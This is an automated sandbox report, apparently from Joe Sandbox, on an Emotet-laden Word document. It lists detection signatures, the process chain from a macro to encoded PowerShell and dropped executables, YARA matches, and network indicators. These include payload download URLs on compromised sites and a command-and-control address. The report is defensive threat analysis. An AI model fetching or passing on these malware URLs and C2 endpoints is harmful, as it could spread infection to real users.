
Analysis Report qNAQ0w2k9I._doc

Overview

General Information

Sample Name: qNAQ0w2k9I._doc (renamed file extension from _doc to doc)
Analysis ID: 269486
MD5: 4cdf130b0bdfe12d16010353bd65c46e
SHA1: 5f7d95434d9ec5e6ac732f7bbe176f22c7ac7daa
SHA256: c8f607b5b5a36af11d0342a5d5957642920b3705c82f630c5a9c9df6396d56d9

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious encrypted Powershell command line found
Yara detected Emotet
Yara detected Emotet Downloader
Creates processes via WMI
Document contains an embedded VBA with many string operations indicating source code obfuscation
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6992 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 7084 cmdline: powersheLL -e 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Qzso.exe (PID: 6312 cmdline: 'C:\Users\user\AppData\Local\Temp\Qzso.exe' MD5: CE4BF8D9B6820C85B4E63AF7BDF56442)
      • atl110.exe (PID: 6204 cmdline: C:\Windows\SysWOW64\cfgmgr32\atl110.exe MD5: CE4BF8D9B6820C85B4E63AF7BDF56442)
  • svchost.exe (PID: 6716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4152 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1716 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2296 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5664 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet


Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Documents\20200818\PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth |
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xdf1:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xdf1:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xdf1:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e
C:\Users\user\Documents\20200818\PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt | JoeSecurity_EmotetDownloader | Yara detected Emotet Downloader | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.1292982021.0000000000700000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.1546324793.0000000002440000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000004.00000002.1546398066.0000000002451000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000003.00000002.1292993963.0000000000711000.00000020.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Found malware configuration
Source: 00000003.00000002.1292982021.0000000000700000.00000040.00000001.sdmp, Malware Configuration Extractor: Emotet
Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exe, Code function: 4_2_02451D6A CryptDecodeObjectEx, 4_2_02451D6A
Source: C:\Users\user\AppData\Local\Temp\Qzso.exe, Code function: 3_2_007128C0 FindNextFileW,FindFirstFileW,FindClose, 3_2_007128C0
Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exe, Code function: 4_2_024528C0 FindNextFileW,FindFirstFileW,FindClose, 4_2_024528C0
Source: global traffic, DNS query: name: seedsagro.com
Source: global traffic, TCP traffic: 192.168.2.5:49742 -> 185.68.16.20:80
Source: global traffic, TCP traffic: 192.168.2.5:49742 -> 185.68.16.20:80
Source: global traffic, HTTP traffic detected: GET /wp-content/MZ9Qd/ HTTP/1.1 | Host: seedsagro.com | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /J1csENEJl1pJZVInw/WWY1m4/ HTTP/1.1 | Referer: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/ | Content-Type: multipart/form-data; boundary=---------------------------478126150544848 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 45.173.88.33 | Content-Length: 4628 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown, TCP traffic detected without corresponding DNS query: 45.173.88.33
Source: unknown, TCP traffic detected without corresponding DNS query: 45.173.88.33
Source: unknown, TCP traffic detected without corresponding DNS query: 45.173.88.33
Source: unknown, TCP traffic detected without corresponding DNS query: 45.173.88.33
Source: unknown, TCP traffic detected without corresponding DNS query: 45.173.88.33
Source: unknown, TCP traffic detected without corresponding DNS query: 45.173.88.33
Source: global traffic, HTTP traffic detected: GET /wp-content/MZ9Qd/ HTTP/1.1 | Host: seedsagro.com | Connection: Keep-Alive
Source: unknown, DNS traffic detected: queries for: seedsagro.com
Source: unknown, HTTP traffic detected: POST /J1csENEJl1pJZVInw/WWY1m4/ HTTP/1.1 | Referer: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/ | Content-Type: multipart/form-data; boundary=---------------------------478126150544848 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 45.173.88.33 | Content-Length: 4628 | Connection: Keep-Alive | Cache-Control: no-cache
Source: atl110.exe, 00000004.00000002.1547265404.000000000275C000.00000004.00000001.sdmp, atl110.exe, 00000004.00000002.1547297484.0000000002764000.00000004.00000001.sdmp, String found in binary or memory: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/
Source: atl110.exe, 00000004.00000002.1547297484.0000000002764000.00000004.00000001.sdmp, String found in binary or memory: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/.
Source: atl110.exe, 00000004.00000002.1547297484.0000000002764000.00000004.00000001.sdmp, String found in binary or memory: http://45.173.88.33/J1csENEJl1pJZVInw/WWY1m4/Z
Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.dr, String found in binary or memory: http://aribsalin.ematj.com/up/E9Oj3tPaCk/
Source: svchost.exe, 00000012.00000002.1545925673.000001491CDD9000.00000004.00000001.sdmp, String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.dr, String found in binary or memory: http://dawood-elmoratel.ematj.com/wp-admin/eDORY317/
Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.dr, String found in binary or memory: http://gpzjw8.net/ekjsn/AV785131/
Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.dr, String found in binary or memory: http://khudothiaquacity.com/wp-admin/FLgiVM8/
Source: svchost.exe, 00000012.00000002.1545925673.000001491CDD9000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000012.00000002.1545925673.000001491CDD9000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.msocsp.com0
Source: D57152E6-26B2-4CBC-A9D2-956A988FC449.0.dr, String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: PowerShell_transcript.141700.ywG7p9SO.20200818013427.txt.1.dr, String found in binary or memory: http://seedsagro.com/wp-content/MZ9Qd/
Source: Qzso.exe, 00000003.00000002.1293036172.00000000007EA000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\AppData\Local\Temp\Qzso.exe, Code function: 3_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState, 3_2_00418A7C
Source: C:\Users\user\AppData\Local\Temp\Qzso.exe, Code function: 3_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 3_2_00416DBB
Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exe, Code function: 4_2_00418A7C GetKeyState,GetKeyState,GetKeyState,GetKeyState, 4_2_00418A7C
Source: C:\Windows\SysWOW64\cfgmgr32\atl110.exe, Code function: 4_2_00416DBB GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 4_2_00416DBB

E-Banking Fraud:

Malicious encrypted Powershell command line found
Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powersheLL -e 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
Yara detected Emotet
Source: Yara match, File source: 00000003.00000002.1292982021.0000000000700000.00000040.00000001.sdmp, type: MEMORY